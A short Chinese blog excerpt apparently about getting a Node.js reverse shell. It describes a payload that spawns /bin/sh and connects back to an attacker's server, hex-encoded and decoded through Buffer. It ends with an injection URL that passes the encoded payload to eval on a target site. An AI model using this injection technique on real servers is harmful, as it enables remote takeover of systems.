Node.js 反向 Shell
如下的 Javascript 就是一个 Node.js 的反向连接 shell
这个 payload 将会生成一个/bin/sh 的 shell,创建一个 TCP 连接到攻击者的服务器,并且在通信数据流中绑定 shell 命令。
为了优雅的执行 payload,我们还需要一些小技巧,我们将反向连接 shell 的 payload 用 16 进制进行编码,然后再用 Node.js 的 Buffer 对象来对其进行解码操作。
http://target.tld/?name=["./;eval(new Buffer('PAYLOAD', 'hex').toString());//*"]
文章来源于:lsh4ck's Blog